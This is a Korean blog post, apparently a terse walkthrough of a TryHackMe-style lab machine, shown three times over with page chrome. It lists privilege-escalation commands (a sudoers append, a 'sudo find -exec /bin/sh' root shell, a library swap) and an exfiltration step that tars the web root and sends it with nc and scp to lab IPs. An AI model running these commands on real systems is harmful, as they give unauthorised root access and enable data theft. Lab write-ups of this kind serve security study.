해킹하는 제다이 큐큐

호그와트

해킹하는 제다이 큐큐

영웅*^%&$ 2023. 4. 25. 14:08

728x90

보면 알다시피 root 권한을 얻는게 엄청 쉽게 되어 있습디야다당

초반에 끝없이 뇌절하는 서버

rm .bashrhc

nano /opt/brilliant_script.sh

#!/bin/sh

echo "alex ALL=(ALL:ALL) ALL" >> /etc/sudoers;

sudo find /etc/passwd -exec /bin/sh \; => root

service ssh start

service cron start

httpd-foreground

-- 단서 ?

cd /lib/x86_64-linux-gnu

sudo mv oldliblogging.so liblogging.so

/root/.ssh/authorized_keys

strings fixutil | grep "fixutil"

/usr/local/apache2/htdocs/

/opt/.fixutil/

/opt/.fixutil/backup.txt --> key

xortool -d reallyimportant.txt myfile.txt

AdsipPewFlfkmll

scp * alex@10.10.204.111:/home/alex/

150c1a1a5024000f324c02040e1901240a074919234505230d0a07144c052c141c1b04310b0368662f4b05031c24441d0604380c19214c0e0a1d1c092f17531d1f700c037d4c2f4b0e0d026610530b153117573204034b19040334031b1d503f03572a03091804020b610d0747

nc -lvp 9007 > backup.tar

cd /usr/local/apache2/htdocs

tar -cvf backup.tar *

nc 10.10.74.101 9007 < backup.tar

요로코롬 푸시면 됩니당 참 쉽죠?

728x90

저작자표시

'호그와트' 카테고리의 다른 글

티키타카의 진수 (0)	2023.05.03
쟤~~쟈자밌는 해킹 (0)	2023.04.27
어허 자네 웹사이트에 얼마나 있는지 좀 볼까? (0)	2023.03.19
간단하게 요세푸스 순열 구하기 (0)	2023.02.02
캐글에 있는 house 데이터 실습 (0)	2023.02.02

현재글해킹하는 제다이 큐큐

논리적인 사색가의 글쓰기여행

AI researcher & the hacker who love meditation and intellectual catharsis ++ GOD level in Tryhackme

COOKIE, panda, Thanks, thank, 쿠키, 뉴진스, 갱얼쥐, rich, GENIUS, 감사합니다, You, Happy, 호그와트, wisdom, 흠냐 #감사합니다, 큐큐, the, bitcoin, 흠냐, 판다,

Today :
Yesterday :

논리적인 사색가의 글쓰기여행

해킹하는 제다이 큐큐

rm .bashrhc

nano /opt/brilliant_script.sh

#!/bin/sh

echo "alex ALL=(ALL:ALL) ALL" >> /etc/sudoers;

sudo find /etc/passwd -exec /bin/sh \; => root

service ssh start

service cron start

httpd-foreground

-- 단서 ?

cd /lib/x86_64-linux-gnu

sudo mv oldliblogging.so liblogging.so

/root/.ssh/authorized_keys

strings fixutil | grep "fixutil"

/usr/local/apache2/htdocs/

/opt/.fixutil/

/opt/.fixutil/backup.txt --> key

xortool -d reallyimportant.txt myfile.txt

AdsipPewFlfkmll

scp * alex@10.10.204.111:/home/alex/

150c1a1a5024000f324c02040e1901240a074919234505230d0a07144c052c141c1b04310b0368662f4b05031c24441d0604380c19214c0e0a1d1c092f17531d1f700c037d4c2f4b0e0d026610530b153117573204034b19040334031b1d503f03572a03091804020b610d0747

nc -lvp 9007 > backup.tar

cd /usr/local/apache2/htdocs

tar -cvf backup.tar *

nc 10.10.74.101 9007 < backup.tar

요로코롬 푸시면 됩니당 참 쉽죠?

'호그와트' 카테고리의 다른 글

'호그와트'의 다른글

티스토리툴바

« 2024/11 »
일	월	화	수	목	금	토
					1	2
3	4	5	6	7	8	9
10	11	12	13	14	15	16
17	18	19	20	21	22	23
24	25	26	27	28	29	30

해킹하는 제다이 큐큐

rm .bashrhc

nano /opt/brilliant_script.sh

​

#!/bin/sh

​

echo "alex ALL=(ALL:ALL) ALL" >> /etc/sudoers;

​

sudo find /etc/passwd -exec /bin/sh \; => root

​

service ssh start

service cron start

httpd-foreground

-- 단서 ?

​

cd /lib/x86_64-linux-gnu

sudo mv oldliblogging.so liblogging.so

​

/root/.ssh/authorized_keys

​

strings fixutil | grep "fixutil"

​

/usr/local/apache2/htdocs/

/opt/.fixutil/

/opt/.fixutil/backup.txt --> key

​

xortool -d reallyimportant.txt myfile.txt

AdsipPewFlfkmll

​

scp * alex@10.10.204.111:/home/alex/

​

150c1a1a5024000f324c02040e1901240a074919234505230d0a07144c052c141c1b04310b0368662f4b05031c24441d0604380c19214c0e0a1d1c092f17531d1f700c037d4c2f4b0e0d026610530b153117573204034b19040334031b1d503f03572a03091804020b610d0747

​

nc -lvp 9007 > backup.tar

cd /usr/local/apache2/htdocs

tar -cvf backup.tar *

nc 10.10.74.101 9007 < backup.tar

​

요로코롬 푸시면 됩니당 참 쉽죠?

'호그와트' 카테고리의 다른 글

'호그와트'의 다른글

관련글

티스토리툴바